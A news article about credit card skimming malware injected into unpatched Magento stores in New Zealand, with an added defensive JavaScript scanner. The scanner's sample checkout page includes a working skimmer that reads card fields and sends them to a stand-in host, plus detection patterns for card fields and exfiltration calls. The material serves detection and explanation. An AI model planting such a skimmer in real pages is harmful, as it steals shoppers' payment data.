Scores of New Zealand online retail sites have been hacked and are infected by credit card skimming software that can steal customers' payment information, a security researcher has found.

The stores run vulnerable, unpatched versions of the Magento shopping cart software.

Unknown criminals are exploiting security holes in the vulnerable systems to inject malicious code written in JavaScript, according to Willem de Groot, who runs a Magento hosting company in the Netherlands.

As unsuspecting customers go to pay for their goods and services, the injected script runs in their browser on the checkout page, silently copies their credit card details and sends them to a server believed to be in Russia, hosted on a provider known to harbour cyber criminals.


The JavaScript malware first appeared in November 2015, but de Groot said the number of hacked sites has jumped by more than two-thirds since then and now stands at over 5,900 worldwide.

A search for .nz on a list of sites published by de Groot and shared with the Herald revealed 47 New Zealand sites that serve up the credit card skimming malware, and 220 in Australia.

The Kiwi sites that are infected are mainly small online retailers, as well as sports associations and art galleries.

The Herald contacted several site operators to ask if they were aware of the malware on their sites, but only received two replies - one operator patched the flaws through their development team, and an online pharmacy said they would investigate their site being hacked.

While de Groot doesn't know how many credit cards have been compromised, he estimated that an earlier attack on the website of the United States Republican party, which uses Magento to accept donations, netted somewhere in the region of US$600,000 since March.

De Groot warned that if attackers are able to insert malware into retailers' Magento shopping carts, it is likely that the site database has been compromised as well.

He advised store operators to contact competent programmers to help recover from the hack, and has set up the MageReport website that allows store owners to check whether their sites are infected or missing security patches.
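As an added illustration of both the injection described above and the kind of check a store owner might run on their own checkout page, the following scanner is example code written for this article; it is not MageReport's code, nor the malware itself. It looks through every script on a page for the three ingredients of the skimmer the article describes: code that reads card fields, a primitive that can push data off the page, and a destination on a host other than the store. All names, domains and the sample checkout page are constructed for the example.

```javascript
// Added example (not from the article or from MageReport): a heuristic
// scan of a checkout page's HTML for the kind of injected JavaScript the
// article describes, i.e. a script that reads card fields and ships them
// to a host other than the store itself. All names, domains and the sample
// page below are constructed for illustration.

// Field names a card form commonly uses (Magento's cc_* names plus generic ones).
const CARD_FIELD_RE = /\b(cc_number|cc_cid|cc_exp_month|cc_exp_year|card_?number|cvv|cvc)\b/i;
// Ways a browser script can push data off-page: XHR, fetch, beacon, or an
// image/script element whose URL carries the payload.
const EXFIL_RE = /(\bXMLHttpRequest\b|\bfetch\s*\(|navigator\.sendBeacon|\bnew\s+Image\b|\.src\s*=)/i;
const URL_RE = /https?:\/\/[^\s"'<>)]+/gi;
const SRC_ATTR_RE = /\bsrc\s*=\s*["']([^"']+)["']/i;

// Resolve a (possibly relative or protocol-relative) URL against the store's
// origin; returns null when the URL cannot be parsed.
function originOf(url, storeOrigin) {
  try {
    return new URL(url, storeOrigin).origin;
  } catch (e) {
    return null;
  }
}

// Returns one finding per suspicious <script> in `html`:
//  - 'external-script' for a src loaded from another origin (review it),
//  - 'inline-skimmer'   for inline code that touches card fields, has an
//                        exfiltration primitive and names a foreign URL.
function findSkimmerIndicators(html, storeOrigin) {
  const findings = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi; // fresh regex: no shared lastIndex
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = SRC_ATTR_RE.exec(attrs);
    if (src) {
      const origin = originOf(src[1], storeOrigin);
      if (origin !== storeOrigin) {
        findings.push({ kind: 'external-script', url: src[1], origin: origin });
      }
      continue;
    }
    const readsCard = CARD_FIELD_RE.test(body);
    const canExfil = EXFIL_RE.test(body);
    // Distinct foreign origins named in the inline code.
    const foreign = Array.from(new Set(
      (body.match(URL_RE) || [])
        .map((u) => originOf(u, storeOrigin))
        .filter((o) => o !== null && o !== storeOrigin)
    ));
    if (readsCard && canExfil && foreign.length > 0) {
      findings.push({ kind: 'inline-skimmer', destinations: foreign });
    }
  }
  return findings;
}

// Constructed checkout page: a same-origin script, a legitimate inline
// validator that reads cc_number but sends nothing, a third-party library,
// and an injected skimmer of the kind the article describes.
const SAMPLE_CHECKOUT_HTML = `
<script src="/js/checkout.js"></script>
<script>
  function validateCard() {
    var n = document.getElementById('cc_number').value.replace(/\\s+/g, '');
    return /^\\d{13,19}$/.test(n);
  }
</script>
<script src="//static.example.org/lib.js"></script>
<form id="co-payment-form">
  <input name="cc_number"><input name="cc_cid">
</form>
<script>
  document.getElementById('co-payment-form').addEventListener('submit', function () {
    var d = {};
    ['cc_number', 'cc_cid', 'cc_exp_month', 'cc_exp_year'].forEach(function (n) {
      d[n] = document.getElementsByName(n)[0].value;
    });
    new Image().src = 'https://collect.example.net/gate.php?d=' + btoa(JSON.stringify(d));
  });
</script>
`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(findSkimmerIndicators(SAMPLE_CHECKOUT_HTML, 'https://shop.example.nz'), null, 2));
}
```

Run against the sample page with the store origin `https://shop.example.nz`, the scanner reports the third-party library as an external script to review and the last inline block as a skimmer posting to `https://collect.example.net`; the same-origin script and the validator are not flagged. Two caveats a practitioner should keep in mind: real skimmers are often obfuscated (hex-escaped strings, base64, encoded hostnames), so a clean result from string matching is not proof the page is clean, and a positive result should be treated the way de Groot advises, as a sign the server and database may be compromised, not just the page.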

The credit card skimming hack comes after last year's "Shoplift" security scare that left vulnerable Magento sites wide open to full takeover by attackers.


According to de Groot, the reason so many Magento sites remain unpatched is because operators either lack the technical knowledge to do so, or can't afford to pay someone to apply the fixes.
